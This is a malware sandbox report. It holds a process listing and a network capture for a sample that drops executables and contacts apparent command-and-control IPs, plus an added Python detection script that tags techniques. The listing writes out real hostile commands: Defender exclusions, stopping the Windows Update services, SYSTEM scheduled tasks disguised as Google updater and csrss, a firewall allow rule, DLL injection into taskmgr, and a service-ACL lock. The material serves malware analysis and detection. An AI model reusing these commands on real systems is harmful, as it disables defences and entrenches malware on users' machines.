C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\hW6pu6vt.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\hW6pu6vt.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\4AF3.exe
C:\Users\Admin\AppData\Local\Temp\4AF3.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Ea32tu8.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Ea32tu8.exe
C:\Users\Admin\AppData\Local\Temp\4D84.exe
C:\Users\Admin\AppData\Local\Temp\4D84.exe
C:\Users\Admin\AppData\Local\Temp\4F3A.exe
C:\Users\Admin\AppData\Local\Temp\4F3A.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff912cc46f8,0x7ff912cc4708,0x7ff912cc4718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5836 -ip 5836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 796
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff912cc46f8,0x7ff912cc4708,0x7ff912cc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff912cc46f8,0x7ff912cc4708,0x7ff912cc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6824 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2nO120ja.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2nO120ja.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3656 -ip 3656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 540
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7284 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7284 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\8520.exe
C:\Users\Admin\AppData\Local\Temp\8520.exe
C:\Users\Admin\AppData\Local\Temp\8725.exe
C:\Users\Admin\AppData\Local\Temp\8725.exe
C:\Users\Admin\AppData\Local\Temp\88AC.exe
C:\Users\Admin\AppData\Local\Temp\88AC.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2516 -ip 2516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 784
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp" /SL5="$F0090,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\A4F0.exe
C:\Users\Admin\AppData\Local\Temp\A4F0.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Query
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1508 -ip 1508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1508 -s 572
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\1157.exe
C:\Users\Admin\AppData\Local\Temp\1157.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8144 /prefetch:8
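The process listing above is a complete defence-evasion and persistence sequence: a Defender exclusion over the whole user profile and Program Files, the Windows Update stack (UsoSvc, WaaSMedicSvc, wuauserv, bits, dosvc) stopped, sleep and hibernation disabled with powercfg, a SYSTEM-level scheduled task named like a Google updater, an inbound firewall allow rule and an ONLOGON task for a binary called csrss.exe that lives in C:\Windows\rss rather than System32, and finally an `sc sdset` that rewrites the security descriptor of the sample's own WinDefender service. The Python below is an added example, not part of the sandbox report or the malware: it re-reads those command lines (copied from the listing, plus one benign `schtasks /Query` as a control) and names the technique each one implements, so the same rules can run over process-creation telemetry such as Sysmon event ID 1. The SDDL rights table is the documented mapping for service objects; the tag names and the SYSTEM32_ONLY list are this example's own assumptions.

```python
"""Triage of the command lines in the behavioral1 process listing above.

Added example, not part of the sandbox report: each rule names the technique a
command line implements.  The rights table is the SDDL mapping for service
objects; the tag names and SYSTEM32_ONLY are this example's own assumptions."""
import re

# SDDL two-letter rights as they apply to a service object (what `sc sdset` edits).
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
# The five services the sample stops all belong to Windows Update delivery.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
# Process names that run only from System32 on a clean host (assumed list).
SYSTEM32_ONLY = {"csrss.exe", "lsass.exe", "services.exe", "smss.exe",
                 "wininit.exe", "winlogon.exe"}

# Command lines copied from the listing above, plus one benign control (last).
OBSERVED = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force",
    r"C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc",
    r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }""",
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r"sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    r'"C:\Windows\system32\schtasks.exe" /Query',
]


def parse_sddl_dacl(sddl):
    """Return [(ace_type, [rights, ...], trustee)] for every ACE in the D: part."""
    dacl = re.search(r"D:((?:\([^)]*\))+)", sddl)
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1)) if dacl else []:
        parts = ace.split(";")            # type;flags;rights;obj;inherit_obj;sid
        rights = parts[2]
        aces.append((parts[0], [rights[i:i + 2] for i in range(0, len(rights), 2)], parts[5]))
    return aces


def _masquerades(path):
    """True when a System32-only process name runs from some other directory."""
    name = path.rsplit("\\", 1)[-1].lower()
    return name in SYSTEM32_ONLY and "\\system32\\" not in path.lower()


def triage(cmdline):
    """Return [(tag, detail), ...] findings for one process command line."""
    findings = []
    low = cmdline.lower()

    # Defender tampering: one exclusion call covers every later drop path.
    if "add-mppreference" in low and "-exclusion" in low:
        findings.append(("defender_exclusion", cmdline))
    if re.search(r"set-mppreference.*?-disable\w+", low):
        findings.append(("defender_disable", cmdline))

    # Stopping the update stack keeps the host unpatched and signatures stale.
    stopped = re.findall(r"\bsc\s+stop\s+(\S+)", cmdline, re.I)
    hit = sorted({s for s in stopped if s.lower() in UPDATE_SERVICES}, key=str.lower)
    if hit:
        findings.append(("update_services_stopped", hit))

    # Inbound allow rule; flag a system process name living outside System32.
    m = re.search(r'netsh\s+advfirewall\s+firewall\s+add\s+rule.*?action=allow.*?program="([^"]+)"', cmdline, re.I)
    if m:
        tag = "firewall_allow_masquerade" if _masquerades(m.group(1)) else "firewall_allow"
        findings.append((tag, m.group(1)))

    # Persistence: SYSTEM / highest-privilege task, or a target borrowing a system name.
    if re.search(r"schtasks\s+/create", low) or "register-scheduledtask" in low:
        highest = "/rl highest" in low or "-runlevel 'highest'" in low
        as_system = bool(re.search(r"/ru\s+'?system'?", low)) or "-user 'system'" in low
        m = re.search(r"""/tr\s+"([^"]+)"|-execute\s+'([^']+)'""", cmdline, re.I)
        target = (m.group(1) or m.group(2)) if m else cmdline
        if _masquerades(target):
            findings.append(("scheduled_task_masquerade", target))
        elif highest or as_system:
            findings.append(("privileged_scheduled_task", target))

    # Service ACL rewrite: report every explicit deny ACE by trustee and right.
    m = re.search(r"\bsc\s+sdset\s+(\S+)\s+(\S+)", cmdline, re.I)
    if m:
        for ace_type, rights, trustee in parse_sddl_dacl(m.group(2)):
            if ace_type == "D":
                denied = [SERVICE_RIGHTS.get(r, r) for r in rights]
                findings.append(("service_sddl_deny", (m.group(1), trustee, denied)))
    return findings


def triage_all(cmdlines):
    """Group findings by tag across a whole process listing."""
    grouped = {}
    for line in cmdlines:
        for tag, detail in triage(line):
            grouped.setdefault(tag, []).append(detail)
    return grouped


if __name__ == "__main__":
    for tag, details in triage_all(OBSERVED).items():
        print(f"{tag}: {details}")
```

Two points the decoded SDDL makes explicit. The `(D;;WPDT;;;BA)` ACE denies Administrators SERVICE_STOP and SERVICE_PAUSE_CONTINUE, so `sc stop WinDefender` or `net stop WinDefender` from an elevated prompt fails; but the preceding allow ACE still grants BA WRITE_DAC and WRITE_OWNER, so an administrator can reset the descriptor with `sc sdset` and then stop the service. And the service is the sample's own `WinDefender` (backing C:\Windows\windefender.exe, dropped above), not Microsoft Defender's `WinDefend`; the name is chosen to be misread in a service list.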
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.178.238.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.209.218.23.in-addr.arpa | udp |
| RU | 193.233.255.73:80 | 193.233.255.73 | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.255.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| FI | 77.91.124.1:80 | 77.91.124.1 | tcp |
| US | 8.8.8.8:53 | 1.124.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 14.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 35.247.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| IE | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| IE | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| DE | 172.217.23.214:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | facebook.com | udp |
| IE | 163.70.151.35:443 | facebook.com | tcp |
| FI | 77.91.68.29:80 | 77.91.68.29 | tcp |
| US | 8.8.8.8:53 | fbcdn.net | udp |
| IE | 163.70.151.35:443 | fbcdn.net | tcp |
| US | 8.8.8.8:53 | fbsbx.com | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.68.91.77.in-addr.arpa | udp |
| RU | 193.233.255.73:80 | 193.233.255.73 | tcp |
| FI | 77.91.68.249:80 | 77.91.68.249 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 249.68.91.77.in-addr.arpa | udp |
| RU | 5.42.65.80:80 | 5.42.65.80 | tcp |
| US | 8.8.8.8:53 | 80.65.42.5.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| FI | 77.91.124.86:19084 | | tcp |
| DE | 172.217.23.214:443 | i.ytimg.com | udp |
| FI | 77.91.68.29:80 | 77.91.68.29 | tcp |
